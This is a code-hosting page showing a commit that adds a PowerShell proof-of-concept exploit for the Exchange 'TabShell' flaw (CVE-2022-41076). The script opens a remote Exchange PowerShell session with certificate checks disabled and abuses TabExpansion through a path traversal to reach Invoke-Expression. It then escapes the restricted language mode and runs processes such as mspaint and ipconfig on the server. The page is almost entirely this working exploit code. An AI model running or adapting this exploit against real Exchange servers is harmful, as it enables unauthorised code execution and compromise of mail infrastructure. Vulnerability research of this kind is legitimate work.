crash.software
Projects
Pull Requests
Issues
Builds
OWASSRF-CVE-2022-41082_TabShell-CVE-2022-41076
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY OWASSRF-CVE-2022-41082_TabShell-CVE-2022-41076 Commits 5381ab8e
🤬
  • ■ ■ ■ ■ ■ ■
    TabShell_CVE-2022-41076_poc.ps1
     1 +$secureString = ConvertTo-SecureString -String "Pwd" -AsPlainText -Force
     2 +$UserCredential = New-Object System.Management.Automation.PSCredential -ArgumentList "lab\john", $secureString
     3 +$version = New-Object -TypeName System.Version -ArgumentList "2.0"
     4 +$mytable = $PSversionTable
     5 +$mytable["WSManStackVersion"] = $version
     6 +$sessionOption = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck -ApplicationArguments @{PSversionTable=$mytable}
     7 +$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://exchange.lab.local/powershell -Credential $UserCredential -Authentication Kerberos -AllowRedirection -SessionOption $sessionOption
     8 + 
     9 + 
     10 +Invoke-Command -Session $Session -ScriptBlock { TabExpansion -line ";../../../../Windows/Microsoft.NET/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/v4.0_3.0.0.0__31bf3856ad364e35/Microsoft.PowerShell.Commands.Utility.dll\Invoke-Expression" -lastWord "-test" }
     11 + 
     12 + 
     13 +Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name" }
     14 + 
     15 +Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "[Diagnostics.Process]::Start('mspaint.exe')" }
     16 + 
     17 +Invoke-Command $session {Microsoft.PowerShell.Commands.Utility\Invoke-Expression "(new-object System.Diagnostics.Process)::Start('mspaint.exe')" }
     18 + 
     19 +invoke-expression "`$ExecutionContext.SessionState.LanguageMode"
     20 + 
     21 +invoke-expression "`$ExecutionContext.SessionState.LanguageMode='FullLanguage'"
     22 + 
     23 + 
     24 +$ps = new-object System.Diagnostics.Process
     25 +$ps.StartInfo.Filename = "ipconfig.exe"
     26 +$ps.StartInfo.Arguments = " /all"
     27 +$ps.StartInfo.RedirectStandardOutput = $True
     28 +$ps.StartInfo.UseShellExecute = $false
     29 +$ps.start()
     30 +$ps.WaitForExit()
     31 +[string] $Out = $ps.StandardOutput.ReadToEnd();
Please wait...
Page is in error, reload to recover